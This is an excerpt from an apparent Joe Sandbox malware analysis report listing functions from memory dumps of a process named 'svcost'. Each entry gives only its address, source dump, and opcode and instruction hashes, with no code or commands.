                                                                                            • Instruction Fuzzy Hash: CA215974E006098FDB04DFB8C486AAEBBF2EF49351F1584A9D505DB362D63199828B80
                                                                                            Function 0069F389 Relevance: .1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1827f786b2e729d9d98e9b686c1826c58d1dcc60ecc8efb7f2b15c750dde9d58
                                                                                            • Instruction ID: c25a05e5446625861f40710aa6de00d9757d89546298a027335b299103f28fc7
                                                                                            • Opcode Fuzzy Hash: 1827f786b2e729d9d98e9b686c1826c58d1dcc60ecc8efb7f2b15c750dde9d58
                                                                                            • Instruction Fuzzy Hash: 2F21E3B4D052499FCF04CFA9D850AAEBFF6AB49310F05816AE814E7751D3349A52CF91
                                                                                            Function 023AABD0 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9fd98810d5af34730d2f164abcaac9846bcf66d68c5206a0783c9d81e4dfdd64
                                                                                            • Instruction ID: e8c102efc1cb92146548d3aeda1302c16ad4985b70654727067949ff6841c076
                                                                                            • Opcode Fuzzy Hash: 9fd98810d5af34730d2f164abcaac9846bcf66d68c5206a0783c9d81e4dfdd64
                                                                                            • Instruction Fuzzy Hash: BC11C835B00244CFDB14DF7488647AEBBF1EB89701F14853AE846DB280DB78C902CB60
                                                                                            Function 002FDD10 Relevance: .1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f11dc687c2c787d571ae677633ce0ce3a7f8959248279a489c2b0f5844522dde
                                                                                            • Instruction ID: 44acded65bcad0a6f5e5503c815cd6e1c70c539e2911188988a96b5bd95c440d
                                                                                            • Opcode Fuzzy Hash: f11dc687c2c787d571ae677633ce0ce3a7f8959248279a489c2b0f5844522dde
                                                                                            • Instruction Fuzzy Hash: 73111276D1420ECBCB08CFA9C8446FEFBB6EB89351F10903AD605B3210D7741A95CBA0
                                                                                            Function 0014D043 Relevance: .1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515026689.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_14d000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c90212439dc8af51ec5ecdd54ce7944fb13a671df6be11b2aa1384cd5e8c2d81
                                                                                            • Instruction ID: 696ae9e0719eee990f200b1ebb2e2a0cdb2b81e3fc05a7a2f3c685d393c22f3c
                                                                                            • Opcode Fuzzy Hash: c90212439dc8af51ec5ecdd54ce7944fb13a671df6be11b2aa1384cd5e8c2d81
                                                                                            • Instruction Fuzzy Hash: 0811AC76504280CFDF12CF10E9C4B1ABFA1FB84710F24C6A9D8084B616C33AD85ACBA2
                                                                                            Function 023AA949 Relevance: .1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d30b2095f4b7f90c1fdbb9f7a04580838df364560fb0607a843e9131e9f9401d
                                                                                            • Instruction ID: 5c6fbabebe538099f3dbe7390e4935ae152a51bba323e2f0f1c3a5ee8d4103df
                                                                                            • Opcode Fuzzy Hash: d30b2095f4b7f90c1fdbb9f7a04580838df364560fb0607a843e9131e9f9401d
                                                                                            • Instruction Fuzzy Hash: E8219279A02219EFDB05CF98D994AADB7F2FF49305F214169E806AB361CB34AD41CB50
                                                                                            Function 023AAD98 Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2948d333f775fd34835d3f3ee274b577d1739d795bad672fa90d7d446acf52e9
                                                                                            • Instruction ID: dc8a4c36ad28c3f8b03d34d8ae49c9f6c57455e3c900f80e788902c56cfbf327
                                                                                            • Opcode Fuzzy Hash: 2948d333f775fd34835d3f3ee274b577d1739d795bad672fa90d7d446acf52e9
                                                                                            • Instruction Fuzzy Hash: B8118C36A05214DFCB15CF64E968C99BBF6FF49311B1044BAE845A7351CB32DD11CB60
                                                                                            Function 023AB880 Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: abf819cc56672cf681b861e92443ed35e8cfd7ac845a971f499a1214dcbc4804
                                                                                            • Instruction ID: b793557a1494d8c99dfcceb64728869ea8b04cd2468c369fec327c0229396468
                                                                                            • Opcode Fuzzy Hash: abf819cc56672cf681b861e92443ed35e8cfd7ac845a971f499a1214dcbc4804
                                                                                            • Instruction Fuzzy Hash: EE01B1326142986FD754DAADE440BDAFFF9EB65364F2880BBE484D7250E731D980C760
                                                                                            Function 023AA828 Relevance: .1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57a784135cb74bb82654fda63cf31bafcd56abc3849d8eea8645c06919057c1c
                                                                                            • Instruction ID: 35fb01b56b57ef7619b423b3d6b239763b4cfff49e7d616415d21e590d9a6b90
                                                                                            • Opcode Fuzzy Hash: 57a784135cb74bb82654fda63cf31bafcd56abc3849d8eea8645c06919057c1c
                                                                                            • Instruction Fuzzy Hash: 9F014876340315AFD7108F59DC94FAA77ADFB89721F108066FA15DB291CB71D811C790
                                                                                            Function 00690811 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e98f3b420a7e48ca02fe9d7831fb7f929862faf71bf64d2d686a3caabd37ec06
                                                                                            • Instruction ID: 78f78e2a18576a4f89ad872d7953a1b5eb5fd143f7ffcb0e93b71aa88ab6bbe7
                                                                                            • Opcode Fuzzy Hash: e98f3b420a7e48ca02fe9d7831fb7f929862faf71bf64d2d686a3caabd37ec06
                                                                                            • Instruction Fuzzy Hash: 4B01B130A09208EFDF05DFA4DA10AADBF75EF47315F1041EAC845972A2CB324A56DF82
                                                                                            Function 0541F030 Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a45937dfb77296720c404c8435f788ce24975d6539fb7bca595f495aaf153fd9
                                                                                            • Instruction ID: f32f09f195ae179b8837fc590a8e3873bd3b404c229f3cb50d6dfcd35bc81e7d
                                                                                            • Opcode Fuzzy Hash: a45937dfb77296720c404c8435f788ce24975d6539fb7bca595f495aaf153fd9
                                                                                            • Instruction Fuzzy Hash: 5C11E2B0E002099FDB48DFA9C8517BFBBF1EF89300F20846A9418A7354DB309A018B91
                                                                                            Function 002F0910 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2046be21772f632203912a8efe25c507d43d52f659e1216f55df6b703863106
                                                                                            • Instruction ID: f3df443f044d41a30ae94ffb9cda097475a29d8c64128d81c4d7a0a60c782b36
                                                                                            • Opcode Fuzzy Hash: b2046be21772f632203912a8efe25c507d43d52f659e1216f55df6b703863106
                                                                                            • Instruction Fuzzy Hash: 02018472D0070A8BDB049BF5D8014EEBB72EFC6321F154725D505771A0EBB0258ECBA1
                                                                                            Function 023ABA58 Relevance: .0, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 26202c38818a95521b9ac0ec7e121f097ac57bdb9a259f4f148854d1bd69ae5a
                                                                                            • Instruction ID: 1c273dc9c8cc2254e43e1d3799b9a1f1e0578079e0721e2a6ea796255ccd6861
                                                                                            • Opcode Fuzzy Hash: 26202c38818a95521b9ac0ec7e121f097ac57bdb9a259f4f148854d1bd69ae5a
                                                                                            • Instruction Fuzzy Hash: A7F0AF713000108FC7049A19D894A2AF7DAFBC9754B208075E609CB366CA26EC018790
                                                                                            Function 023A9C49 Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 266f204bb2ef189d40640cc4621c4bf1d9a3ab887c7b3a5c3b01678c7c40c870
                                                                                            • Instruction ID: 6576d871311c818e21993d168aff44e5ed1efc4451c89100019c1fd3d20d068e
                                                                                            • Opcode Fuzzy Hash: 266f204bb2ef189d40640cc4621c4bf1d9a3ab887c7b3a5c3b01678c7c40c870
                                                                                            • Instruction Fuzzy Hash: 31F02871B09361AFE31587649C20B16BBF9EF8A320F0540BAD5499B392CB62AC00C390
                                                                                            Function 0211D480 Relevance: .0, Instructions: 40COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac77acc3e508c40dd162f74abe51e758b2610ef4738847311c96ff47702604ca
                                                                                            • Instruction ID: ff4cb68601d61ea1348a90a458a26d176642ad250e0ecb4c329e7b01152ae3c0
                                                                                            • Opcode Fuzzy Hash: ac77acc3e508c40dd162f74abe51e758b2610ef4738847311c96ff47702604ca
                                                                                            • Instruction Fuzzy Hash: 40014B70D45208DFCB04DFA8D9556EDBBB5EF49304F1045AAD819E3650E7395A40CB51
                                                                                            Function 0069BA40 Relevance: .0, Instructions: 40COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf5632d496d71956a07ff9f3415cf557789b076886e89955e5a78fb33b5fe0cb
                                                                                            • Instruction ID: 208732260d018133499ff56b2053b2a78016949a77c56846fda01f568e00066e
                                                                                            • Opcode Fuzzy Hash: bf5632d496d71956a07ff9f3415cf557789b076886e89955e5a78fb33b5fe0cb
                                                                                            • Instruction Fuzzy Hash: 78017C3180424AEFCF02DF94D8508EDBF75FF8A310F04C14AE95467621D735A666CB90
                                                                                            Function 006983BE Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7462487a168545172d438ff1e546b43ce164232364cf5f58abf63f5928fe9186
                                                                                            • Instruction ID: fa7e3ea370332d356fa06692d1476ea39725218c456b346c56f6a5abbbf31730
                                                                                            • Opcode Fuzzy Hash: 7462487a168545172d438ff1e546b43ce164232364cf5f58abf63f5928fe9186
                                                                                            • Instruction Fuzzy Hash: 4101A77080E3C59FCF12CBB4DA61568BFB9DF43204F1845DBC4909BA93D5349A1ACB12
                                                                                            Function 0211E678 Relevance: .0, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cd3193be62e7529fbf76b41fd00e61a614bff9550373f409a2829cc0fa8ac79e
                                                                                            • Instruction ID: 3d85a55090aeba346be95be01b9cf878d1a7b7104d96492ec433da1d8266d52b
                                                                                            • Opcode Fuzzy Hash: cd3193be62e7529fbf76b41fd00e61a614bff9550373f409a2829cc0fa8ac79e
                                                                                            • Instruction Fuzzy Hash: 5CF02836B041485FCB158668C854AAEBFA6EFD4210F08816FED0597761DF319C06C780
                                                                                            Function 023A9CB0 Relevance: .0, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82b56b4309e4ec8b6ab7b9594efd335b6088d5bb59a7f86eb0a5e746d402c92a
                                                                                            • Instruction ID: 2d7603cc7c04cc86bce7e9e4535e1cd45dc0fec340c9d574d7ed4ecdb8a96590
                                                                                            • Opcode Fuzzy Hash: 82b56b4309e4ec8b6ab7b9594efd335b6088d5bb59a7f86eb0a5e746d402c92a
                                                                                            • Instruction Fuzzy Hash: B7F024A2B0D7918FE31203741C20325BBE5CBC7201F1841BBC1869F3E2DA869802C350
                                                                                            Function 002F0994 Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba19b41c448bba7e159c0270b51f95fe0daa22e69a96a7ffa86c75fde73b2ad7
                                                                                            • Instruction ID: 1477b620a23ee73ae1bb13dacf0349e8bc8c715e548fab04f9b43ce084b7fcc9
                                                                                            • Opcode Fuzzy Hash: ba19b41c448bba7e159c0270b51f95fe0daa22e69a96a7ffa86c75fde73b2ad7
                                                                                            • Instruction Fuzzy Hash: 16F028319042889BDB05D770C8659FFBFBA4B85300F05856BD002AB282DEB41406C3C1
                                                                                            Function 023A9C58 Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b61408c1696fccbf8d49569f0a065cc6daea97c7685c389aeb3683679d890cc2
                                                                                            • Instruction ID: 6337380babd58750aeea6aa84a93bda787c73c6aa3f1bae8bd8b54cb276ba678
                                                                                            • Opcode Fuzzy Hash: b61408c1696fccbf8d49569f0a065cc6daea97c7685c389aeb3683679d890cc2
                                                                                            • Instruction Fuzzy Hash: 15F0E972B047119FE71486599C10B2BF7E9EBC9720F144039D506AB390CF72AC4183D4
                                                                                            Function 023AA818 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2155c2826bfc91ca0e542c85c17de05cf1f17848a056adab78da8aa35e7f61e
                                                                                            • Instruction ID: 8563a7cf62b5e4ac25da74cb2aef6d80cbcf76f525c0ea90a292378d9b734b41
                                                                                            • Opcode Fuzzy Hash: b2155c2826bfc91ca0e542c85c17de05cf1f17848a056adab78da8aa35e7f61e
                                                                                            • Instruction Fuzzy Hash: A4F09A363043489FC7058F2AD894C5A7BB9FF8A62430580BAF909CB322CA61D805CBA0
                                                                                            Function 023A5F02 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1b50ac89b61dee2a4ebd2f0c60118297476bf8aec11f2a55b09f5a86f9c23770
                                                                                            • Instruction ID: 2ceb08f0f7785aeef205cf6aefb7f28ccd6eb0abcab5bfd5ecee3b59be9717a0
                                                                                            • Opcode Fuzzy Hash: 1b50ac89b61dee2a4ebd2f0c60118297476bf8aec11f2a55b09f5a86f9c23770
                                                                                            • Instruction Fuzzy Hash: 20F0CD74D05348EFCB01DFA8E89569CBBB8EB06205F4000A6D848E3361DB309A41CB41
                                                                                            Function 02119048 Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba01399b89b52cd291166863ca82564dfcde78d98673454e0bce3f3630a55d74
                                                                                            • Instruction ID: 7607046cfe2a35a2039141a3d7bf53b515492df5d7b46feefee7fe283716e1b6
                                                                                            • Opcode Fuzzy Hash: ba01399b89b52cd291166863ca82564dfcde78d98673454e0bce3f3630a55d74
                                                                                            • Instruction Fuzzy Hash: 80F04F70949288AFCB45CFA8C860AADBFF8EB4A310F14C5DAD865D7252C6358A11DF50
                                                                                            Function 023ABF10 Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3db84ab5b466cbd3fa1f96c4078208ef450cd18a9b3e7419473a9cdddb44d24b
                                                                                            • Instruction ID: 25493953fa90e5e9f5337d0d89de831072d9e6a32d67ededb2ec318b91927923
                                                                                            • Opcode Fuzzy Hash: 3db84ab5b466cbd3fa1f96c4078208ef450cd18a9b3e7419473a9cdddb44d24b
                                                                                            • Instruction Fuzzy Hash: 59F05431A0C748EFCB0ADB74985869DBFB7DB85218F08C1E6E049D6152DF781A85CB85
                                                                                            Function 021159D1 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c87aab86f9ed1e325e18a244eaad7f4e47f28cac236a7b29d8f66ee65c912580
                                                                                            • Instruction ID: 9ab04a57733e8738c44ea8fc4f0613593bc41923c4b200c19f922f5f9792fdce
                                                                                            • Opcode Fuzzy Hash: c87aab86f9ed1e325e18a244eaad7f4e47f28cac236a7b29d8f66ee65c912580
                                                                                            • Instruction Fuzzy Hash: 5A016934A8832CDFCB18DF65CA89ADCB7F6AF89301F4191A4D00DAB241D7309A44CF50
                                                                                            Function 0069BA50 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cd14ae27b04c535a4772089127991c5b2fd00a6cfe78f81c6b337b08b094de34
                                                                                            • Instruction ID: 6dd6f0fe478a8041be432d395de1dc8489420061c2ff159ac5c99548dd45468b
                                                                                            • Opcode Fuzzy Hash: cd14ae27b04c535a4772089127991c5b2fd00a6cfe78f81c6b337b08b094de34
                                                                                            • Instruction Fuzzy Hash: A6F0E771C0020AEBCF01DF99D9109EEBB79FF89324F10C519E95827210D732A6A6DB90
                                                                                            Function 0069E4F6 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b823d0d0b1f049620d6e3b0fc354e13b09e9e83e9e940a1046f33122df1c6e9f
                                                                                            • Instruction ID: c32b48ff55a7688a31aefd04c475c8ab0a7838438959cd0c2cd396a126795119
                                                                                            • Opcode Fuzzy Hash: b823d0d0b1f049620d6e3b0fc354e13b09e9e83e9e940a1046f33122df1c6e9f
                                                                                            • Instruction Fuzzy Hash: 16F03C35C0060A9ACF14DFA9D8508EDFBB4FF89314F10D65AD85833610D732AA96CF90
                                                                                            Function 023ADB88 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d4bf43c425eb95a234a47ad204f56959b3921327b41b66c3635916f74ce98eb
                                                                                            • Instruction ID: b48f888693403b1a70786d47b38024c8002dc35a6cf9b2f4b30a7d47e0921c00
                                                                                            • Opcode Fuzzy Hash: 7d4bf43c425eb95a234a47ad204f56959b3921327b41b66c3635916f74ce98eb
                                                                                            • Instruction Fuzzy Hash: 81F0903594925D9BDB08DF60CC259DEFFB2EB89300F14457AC002B3655CBBA1D04CBA1
                                                                                            Function 0211D997 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 191474a3b78e41b2c25bdb35955f51bf2c251be0a02afe31f9d92ce60bd9e7cf
                                                                                            • Instruction ID: 06406f04a2da56e04d503948fdf2e229e20ac0f2e1adac8ce9b5b43da11727a1
                                                                                            • Opcode Fuzzy Hash: 191474a3b78e41b2c25bdb35955f51bf2c251be0a02afe31f9d92ce60bd9e7cf
                                                                                            • Instruction Fuzzy Hash: 2FF067349493889FCB45DFA8E464AADBFF4AF4A200F0480EAC88497266C6389904CF12
                                                                                            Function 0069C8E0 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e3e1516355976d6ac618d0054c2ab8b91eb6834ec8af9646ceb2acabde9a63eb
                                                                                            • Instruction ID: d97ab1c6a985f8b57a920236dcac61009ba4f2ab4ea88f1a07083a18409e1ada
                                                                                            • Opcode Fuzzy Hash: e3e1516355976d6ac618d0054c2ab8b91eb6834ec8af9646ceb2acabde9a63eb
                                                                                            • Instruction Fuzzy Hash: 19F0B435809388EFCB02CFA0C9209ACBF75AF0A300F04C0EADC5447362C2358A22DB91
                                                                                            Function 006996F8 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
